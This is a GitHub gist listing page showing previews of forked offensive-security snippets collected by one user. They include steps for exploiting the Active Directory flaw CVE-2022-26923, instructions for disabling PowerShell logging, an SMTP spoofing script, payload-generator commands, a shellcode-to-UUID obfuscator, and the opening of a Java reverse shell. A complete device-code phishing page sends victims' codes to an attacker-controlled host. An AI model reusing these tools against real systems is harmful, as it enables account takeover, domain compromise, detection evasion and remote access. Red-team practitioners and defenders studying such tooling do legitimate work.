Steve Borosh rvrsh3ll
rvrsh3ll
/ Program.cs
Created
May 12, 2022 11:45
— forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
| // Author: @domchell - MDSec | |
| // This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
| // Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
| // Steps: | |
| // 1. Escalate on any workstation (hint: krbrelayup ftw) | |
| // 2. Execute UpdateMachineAccount.exe as SYSTEM | |
| // 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
| // 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |
rvrsh3ll
/ PowerShellNTFSStaticFileServer.ps1
Created
October 22, 2022 03:20
— forked from Tiberriver256/PowerShellNTFSStaticFileServer.ps1
This script starts a small web server listening on localhost:8080 that will impersonate the authenticated user and serve static content. This means if they do not have NTFS permissions to the file they will get an access denied or a 404 file not found if they do not have NTFS access to list contents of the directory.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DirectoryContent { | |
| <# | |
| .SYNOPSIS | |
| Function to get directory content | |
| .EXAMPLE | |
| Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/" | |
rvrsh3ll
/ gist:2139f0ae7869f268dec4c6007d434185
Created
October 10, 2022 06:39
— forked from ThunderGunExpress/gist:d221b316c94c4b7403f3179292c23ccb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //All credit goes to Ysoserial.net and the great @tiraniddo | |
| //Snippets copied from ysoserial.net | |
| //https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
| //https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| using System.IO; | |
| using System.Reflection; |
rvrsh3ll
/ info.txt
Created
October 5, 2022 18:09
— forked from hook-s3c/info.txt
Disable Powershell logging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Logs are held by default in the user profile: | |
| \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
| this directory also hosts per-application logs | |
| -------------------------------------------------------------- | |
| Disable Logging... | |
| remove-module psreadline |
rvrsh3ll
/ spoof.py
Created
October 3, 2022 20:33
— forked from ustayready/spoof.py
Simple unfinished SMTP spoof script for use with Office365 DirectSend SmartHosts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import smtplib | |
| from email.mime.text import MIMEText | |
| from email.mime.multipart import MIMEMultipart | |
| from email.mime.text import MIMEText | |
| from email.mime.base import MIMEBase | |
| from email import encoders | |
| import ssl | |
| import email | |
| import argparse |
rvrsh3ll
/ GadgetToJScript Command Reference
Created
February 12, 2020 11:44
— forked from 3xpl01tc0d3r/GadgetToJScript Command Reference
GadgetToJScript Code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to generate HTA code using GadgetsToJScript | |
| GadgetToJScript.exe -w hta | |
| # Command to generate JS code using GadgetsToJScript | |
| GadgetToJScript.exe -w js | |
| # Command to generate VBS code using GadgetsToJScript | |
| GadgetToJScript.exe -w vbs | |
| # Command to generate VBA code using GadgetsToJScript |
rvrsh3ll
/ S3UpDown.ps1
Created
August 21, 2022 15:23
— forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Upload | |
| &{ | |
| $ErrorActionPreference = 'Stop' | |
| $AWSRegion = "us-east-1" | |
| $AWSAccessKeyId = "TODO: Access Key" | |
| $AWSSecretAccessKey = "TODO: Secret Access Key" | |
| $BucketName = "TODO: Bucket Name" | |
| [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null | |
| $OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog | |
| $OpenFileDialog.ShowDialog() | Out-Null |
rvrsh3ll
/ generate.html
Created
August 1, 2022 01:03
— forked from Mr-Un1k0d3r/generate.html
office device code phishing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- This page can be formatted to look like something more interesting --> | |
| <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
| <script> | |
| $.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
| $.get("https://attackercontrolled.com/?id=" + data.device_code); | |
| document.write(data.message); | |
| }); | |
| </script> |
rvrsh3ll
/ binToUUIDs.py
Created
February 2, 2021 21:20
— forked from ajpc500/binToUUIDs.py
Convert shellcode file to UUIDs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from uuid import UUID | |
| import os | |
| import sys | |
| # Usage: python3 binToUUIDs.py shellcode.bin [--print] | |
| print(""" | |
| ____ _ _______ _ _ _ _ _____ _____ | |
| | _ \(_) |__ __| | | | | | | |_ _| __ \ | |
| | |_) |_ _ __ | | ___ | | | | | | | | | | | | |___ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Not sure where I originally got this from. | |
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.io.OutputStream; | |
| import java.net.Socket; | |
| public class C { | |
| public C() throws Exception { | |
| String host="10.0.0.90"; |